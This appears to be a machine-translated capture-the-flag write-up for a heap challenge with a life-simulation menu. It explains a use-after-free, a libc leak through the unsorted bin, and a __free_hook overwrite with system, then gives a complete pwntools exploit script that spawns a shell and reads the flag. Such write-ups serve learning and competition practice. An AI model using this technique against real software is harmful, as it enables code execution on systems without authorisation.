The name is very long, and the program is as long as the name. It is estimated that it is mainly to increase the amount of code reading (increase the difficulty)
There are many menus, so you don't copy the code. The important contents are as follows:
- wroking's job is to earn money. After watching it for a long time, I feel useless. I ask for too much money, mainly by losing money.
- improving yourself: the maximum size when building blocks
- 2000 +8
- 5000 +16
- 10000 + 32 because you need a large block to get unsort in the heap, you need to call here
- make new friend one is to spend money and the other is to build blocks
- (2) - If you don't do anything else, you can directly reduce 200 yuan. This is good. You lose faster than others
- (3) To create a block, first calloc 0x20, then create a block of the specified size, and put a pointer in 0x20. Attacking the pointer of the management block is a conventional strategy
- visit friends here is free
- (3) Direct free does not delete the pointer - vulnerability point, with UAF
- Buying is buying a house and a car. It's a risk. It's useless. Just walk through the motions
- car -100000
- house -500000
- get married here will output the value pointed to by the pointer, that is, show is only used once. When the block is released to unsort, libc is obtained here
- quality_ If you have a house, a car and money, you can modify the value, that is, edit
Add, free, show and edit are available, but the size and number of blocks are limited. The steps are as follows:
- In order to ensure that there is a house and a car, you need a lot of money. First call 3/2 *n to directly reduce it to a negative number and get a huge money
- Buy a house and a car 5 / 1,5 / 2
- Increase charm by 2/3 *n
- Start of text: first build 8 0x80 blocks 3 / 3, then release 4 / 3, fill tcache and release to unsort
- 6:show(0) get main_arena+0x60 address, get libc
- At this time, the management block of Block 0 is in fastbin and the management block of block 1 is in tcache. At this time, a block of 0x28 is built. The management block occupies the management block of 0 and the data block occupies the management block of 1. The pointer of the management block of 1 is modified through this block to point to free_ Hook (it's a little troublesome to write free_hook in the higher version of libc, but thanks to the pointer, you can write it directly)
- 7:edit(1) in__ free_ Write system in hook
- Then release the block with / bin/sh
Full exp
from pwn import * p= process('./pwn') libc_elf = ELF('/lib/x86_64-linux-gnu/libc.so.6') menu = 'flat\nChoice: ' def money(): p.sendlineafter(menu, b'3\n2') def get_house_car(): p.sendlineafter(menu, b'5\n1') p.sendlineafter(menu, b'5\n2') def get_charm(): #max size +32 p.sendlineafter(menu, b'2\n3') def add(size, msg): #make friend p.sendlineafter(menu, b'3') p.sendlineafter(b'.\nChoice: ', b'3') p.sendlineafter(b'Now, tell me, what do you look for in a partner:', str(size).encode()) p.sendafter(b'Give your new male friend a nickname: ', b'B'*0x10) p.sendlineafter(b"For both of you, a little greeting: ", msg) def free(idx): # visit friends p.sendlineafter(menu, b'4') p.sendlineafter(b"Please choose your male friends to visit: ", str(idx).encode()) p.sendlineafter(b'Choice: ', b'3') def show(idx): #get married p.sendlineafter(menu, b'6') p.sendlineafter(b'Which male friends do you want to marry?', str(idx).encode()) def edit(idx, msg): #quality life p.sendlineafter(menu, b'999') p.sendlineafter(b"Please choice a male friends: ", str(idx).encode()) p.sendlineafter(b"Put your thoughts in his heart: ", msg) context(arch='amd64', log_level='debug') p.sendlineafter(b'Name: ', b'AAAAAAAA') p.sendlineafter(b'Age: ', b'18') p.sendlineafter(b'Sex (1:man,2: woman): ', b'2') for i in range(5): money() get_house_car() for i in range(10): get_charm() for i in range(8): add(0x100, b'AAAA') for i in range(8): free(7-i) show(0) p.recvuntil("Now, your groom will make a lifetime commitment to you: ") libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x60 -0x10 - libc_elf.sym['__malloc_hook'] free_hook = libc_base + libc_elf.sym['__free_hook'] system = libc_base + libc_elf.sym['system'] print('libc:', hex(libc_base)) p.send(b'\n\n') add(0x28, b'/bin/sh\x00'*2+ p64(0x100) + p64(free_hook)) edit(1, p64(system)) free(1) p.sendline(b'cat /flag') p.interactive()
The libc-2.33-0ubantu5 used for this problem is libc-2.31 on my machine, which may be different. 0 solve the problem. There was no chance to do it during the game. It can't be done after the game. It's done today. It can be passed locally.